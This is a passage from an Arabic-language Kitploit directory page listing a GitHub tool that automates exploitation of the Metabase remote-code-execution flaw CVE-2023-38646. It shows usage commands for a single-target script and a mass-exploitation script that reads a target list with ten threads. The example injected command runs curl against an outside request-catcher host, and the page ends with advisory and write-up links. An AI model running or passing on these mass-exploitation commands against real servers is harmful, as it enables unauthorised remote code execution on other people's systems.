Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — أدوات تلقائية لاستغلال Metabase المعروف باسم CVE-2023-38646 | Kitploit
أدوات/GitHubGitHub/robotmikhro/cve-2023-38646
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubrobotmikhro/cve-2023-38646

CVE-2023-38646

أدوات تلقائية لاستغلال Metabase المعروف باسم CVE-2023-38646

عرض المستودع
276منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646

أدوات آلية لاستغلال ثغرة RCE في Metabase والمعروفة باسم CVE-2023-38646. اقرأ https://secry.me/explore/news/metabase-rce-cve-2023-38646/ لمزيد من المعلومات (POC، Dork)

كيفية استخدام single.py

CVE-2023-38646-Single Exploit

root@kitploit:~
python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"

أو

root@kitploit:~
python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

كيفية استخدام mass.py

CVE-2023-38646-Mass Exploit

root@kitploit:~
python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt

أو

root@kitploit:~
python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"

مرجع POC

  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
  • https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
  • https://www.metabase.com/blog/security-advisory
  • Twitter
تنزيل الأداة